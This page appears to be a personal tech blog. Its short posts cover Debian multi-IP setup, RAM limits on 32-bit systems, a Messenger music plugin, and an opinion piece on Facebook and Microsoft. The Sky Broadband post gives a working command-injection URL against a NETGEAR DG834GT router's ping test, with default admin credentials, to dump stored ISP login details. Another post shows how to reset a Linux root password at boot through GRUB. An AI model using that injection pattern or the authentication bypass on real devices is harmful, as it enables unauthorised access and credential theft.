Setting multiple IPs on Linux or in this case Debian is rather straight forward… All the network info is stored in the file /etc/network/interfaces and you just need to add the info to the file…

Before making changes to this file, I recommend you check your values at least 3 times! If you have made a mistake and trying to do it from a remote location, YOU WILL LOCK YOURSELF OUT!

This is a sample configuration with device eth0 having the IP address of 192.168.1.2 on a Class C Network with 192.168.1.1 as the default gateway.

/etc/network/interfaces:

# /etc/network/interfaces – configuration file for ifup(8), ifdown(8)

# the loopback interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static

address 192.168.1.2
netmask 255.255.255.0
broadcast 192.168.1.255
gateway 192.168.1.1

In order to add multiple IPs to the same interface, In this case eth0 You need to add it in the following method…

auto eth0:0
iface eth0:0 inet static

address 192.168.1.3
netmask 255.255.255.0
broadcast 192.168.1.255

auto eth0:1
iface eth0:1 inet static

address 192.168.1.4
netmask 255.255.255.0
broadcast 192.168.1.255

auto eth0:2
iface eth0:2 inet static

address 192.168.1.5
netmask 255.255.255.0
broadcast 192.168.1.255

Thats it, after you have made all the necessary changes, you need to restart the networking by issueing the following command…

# /etc/init.d/networking restart

{ 1 comment }

This is a common issue and I have come across of this question numerous times on the ASUS Forums, so I have decided to post some info regarding this issue.

If your system has 4GB of RAM or have upgraded to 4GB (Or more) and running a 32-Bit Operating System, It will most likely say you have around 3GB of RAM. Unfortunately there is no way you are going to see all the RAM you paid for.

On the other hand, if you are running a 64-Bit Operating System (Which is designed to support 4GB more), you might be able to see all the RAM but it depends on your motherboard Chipset and the BIOS need to support memory remapping feature.

If you really need to have 4GB or more RAM, you need to check whether the motherboard chipset support at least 8 GB of address space and it must support 64-Bit architecture.

Furthermore, you need to run a 64-Bit Operating System such as Windows XP 64-Bit or Vista 64-Bit to utilise all the installed RAM.

I would recommend you read through the following URL Here.

{ 0 comments }

Sky Broadband is aimed for home users thus a few features like SSH (Port 22), VPN and other tunneling are disabled by the router (NETGEAR DG834GT) they provide. If you want to use these features, you have two choices…

  • Use another Router
  • Re-flash the firmware of the Sky Router (NETGEAR DG834GT)

Re-flashing the router is risky and I am sure it is against Sky’s Terms and Conditions, because as far as I’m aware, that router is a property of Sky. If you are thinking of doing it, then Good Luck!

Using another router is the smartest thing to do, But for you to use another router, you do need the Sky Username and Password.

This is how you get the Sky Username and Password…

Open up your browser and Copy and paste the following URL to the Address Bar. (Make sure its in one line, not two!)


http://192.168.0.1/setup.cgi?todo=ping_test&c4_IPAddr=%26/bin/grep+ppoa_+/tmp/nvram+%3E+/www/netgear.cfg

It will ask for Username and Password, use the follwoing unless you have changed your Router Login info, then use that.

Username:admin
Password: sky

You will get a page that reads “Usage: ping [OPTION]… host”

Now Copy and paste the following URL to the Web Browser’s Address Bar.

http://192.168.0.1/netgear.cfg

This will then download a config file, “netgear.cfg

Open the file with wordpad or any other Text Editor.

You should see some text like this below :

pppoa_username=001122aabbcc@skydsl
pppoa_password=a0b1c2d4e5
pppoa_idle=0
pppoa_ipaddr=

That’s it, Use those above info with another router, and you should be able to connect to Sky Broadband.

{ 4 comments }

Windows Live Messenger sometimes doesn’t show the music you play on Windows Media Player even though you set it to show.

The work around is the following…

Open up Windows Media Player, and go to Tools => Options (You might need to hit the ALT key to see the hidden menu)

Click the Plug-ins tab, then on the Category Column, Click on Background and make sure Windows Live Messenger Music Plug-in is ticked. If not, tick it and Apply then OK.

See the following screenshot for more info…

Now you should be able to Show what you play on Windows Media Player.

{ 49 comments }

It is pretty easy when it comes to gaining root password to any Linux System as long as you have physical access.

This is how to change Fedora’s ROOT Password.

When your box starts up, You will see the GRUB screen…

What you need to do is, press the a Key instead of Enter

You will see something like the following…

kernel /vmlinuz-2.6.9-1.667 ro root=LABEL=/ acpi=on rhgb quiet

Add 1 at the end of that… So it looks like the following…

kernel /vmlinuz-2.6.9-1.667 ro root=LABEL=/ acpi=on rhgb quiet 1

This will make the box boot into Runlevel 1

You simply type

passwd

Enter the new ROOT password and reboot the machine.

Same thing goes for Any Linux System as welll… All you got to do is, add the following kernel argument…

init=/bin/bash

And then just change the password…

{ 4 comments }

I was rather amused to read an article on TechCrunch couple of days ago under the title “Could Facebook Become The Next Microsoft?” The writer Duncan Riley went onto write that Facebook is going to be the next Microsoft on the web world. Before you read my review on the article, I suggest you read Duncan Riley’s article on TechCrunch Here

Everybody knows about Microsoft and Facebook. I will give a brief introduction about both Companies, so this article will make more sense to the reader…

Microsoft is the leading Operating Systems and software manufacturer in the world. Thousands of companies depend on Microsoft’s to make their revenue by developing third party software for their Operating Systems. Furthermore, there are millions of people and companies who uses Microsoft Software and Operating Systems are familiarised with products and rely on them.

Facebook is a Social Networking Website with some nifty features. These features being, third party applications. This means Facebook will not run the third party applications on their servers, the Facebook Platform is able to communicate with third party applications running on external servers which are not under the control of Facebook, Which means Facebook allows you to pipe information through their API (Application Programming Interface). If you want to know more about how this system works, you should have a read at Facebook Developers

The author of this article Duncan Riley only concentrated on the Facebook Applications which are supported mostly by third parties and he went onto directly compare it with Microsoft. He is directly comparing Microsoft based third party applications (i.e. Software made by other companies, for example Adobe, AutoDesk, Symantec) with Facebook applications. His argument being, If Facebook could control the third party applications like Microsoft is controlling other software developers, then one day Facebook will be the next Microsoft and have some kind of Web OS.

He is pretty much confused the fact that Facebook being a platform will offer opportunities to third party developers. But you need to think about the target audience. Most of the people are forced to use Microsoft Operating Systems and some of its Software…You can argue the fact that it is not true, but if you analyse the situation, you will think otherwise. In the years Microsoft has created an environment where most of the users are forced to use their products.

One main difference being, the users of Facebook have a choice; they have chose to use Facebook, so the target audience of Facebook is far less compared to Microsoft. When it comes to Applications, Facebook pretty much have control over it, but when you compare it to Microsoft and their party applications, it is not the case. By law, Microsoft is forced to work with third party software makers. This is a huge advantage on the software developers side, Microsoft can’t just stop you from making software for their Operating Systems because they don’t like it, or they think you are making more profit from it. This is different when it comes to Facebook, they can just stop you, simple as that. There is no law to protect the third party application makers.

Since Facebook is a web platform, there are a huge security concerns when it comes to third party applications. This is why they don’t let them run it on their servers, otherwise they would get hacked within minutes. The third party applications run on external servers and piped through the Facebook API. This means, the applications will be slow depending on the server / connection it is in… When the external server is down or something wrong with the route between the Facebook servers and the external application servers, it will not work. So, the people who are going to get affected are the end users.

My conclusion being, you can’t just go and compare Microsoft with a Social Networking site with some addons. It is pretty stupid of the writer to go and compare a Software Giant with a website which allows external applications. An average user might think he has a point, but you analyse the facts, the author is completely wrong!

You can’t just go ahead and compare cats and dogs because they have 4 legs.

{ 2 comments }